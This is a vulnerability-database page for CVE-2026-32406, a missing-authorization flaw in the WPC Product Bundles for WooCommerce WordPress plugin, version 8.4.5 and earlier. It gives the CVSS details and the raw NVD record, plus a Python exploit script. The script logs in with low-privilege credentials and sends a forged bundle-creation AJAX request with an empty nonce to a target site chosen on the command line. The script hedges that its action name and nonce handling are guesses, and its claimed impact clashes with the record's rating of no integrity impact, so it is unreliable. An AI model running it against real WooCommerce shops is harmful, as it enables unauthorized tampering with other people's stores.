Security Vulnerability Report
中文
CVE-2026-32406 CVSS 4.3 MEDIUM

CVE-2026-32406

Published: 2026-03-13 19:54:57
Last Modified: 2026-04-22 21:30:26

Description

Missing Authorization vulnerability in WPClever WPC Product Bundles for WooCommerce woo-product-bundle allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WPC Product Bundles for WooCommerce: from n/a through <= 8.4.5.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WPC Product Bundles for WooCommerce <= 8.4.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-32406 PoC - Missing Authorization in WPC Product Bundles for WooCommerce # Target: WordPress site with woo-product-bundle plugin <= 8.4.5 def exploit_missing_auth(target_url, username, password): """ Exploit missing authorization vulnerability Requires low-privilege WordPress account """ session = requests.Session() # Step 1: Authenticate with low-privilege account login_url = f"{target_url}/wp-login.php" auth_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In' } session.post(login_url, data=auth_data) # Step 2: Exploit broken access control via AJAX endpoint ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Example: Unauthorized bundle manipulation exploit_data = { 'action': 'wpc_add_bundle', # May vary based on plugin version 'bundle_data': { 'name': 'Malicious Bundle', 'products': [1, 2, 3], 'discount': '50%' }, 'nonce': '' # May not be properly validated } response = session.post(ajax_url, data=exploit_data) if response.status_code == 200: print(f"[!] Exploit successful - unauthorized action performed") print(f"Response: {response.text}") return True else: print(f"[*] Exploit failed or patched") return False if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") sys.exit(1) exploit_missing_auth(sys.argv[1], sys.argv[2], sys.argv[3])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32406", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:57.010", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in WPClever WPC Product Bundles for WooCommerce woo-product-bundle allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WPC Product Bundles for WooCommerce: from n/a through <= 8.4.5."}, {"lang": "es", "value": "Vulnerabilidad por falta de autorización en WPClever WPC Product Bundles for WooCommerce woo-product-bundle permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a WPC Product Bundles for WooCommerce: desde n/a hasta &lt;= 8.4.5."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/woo-product-bundle/vulnerability/wordpress-wpc-product-bundles-for-woocommerce-plugin-8-4-5-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}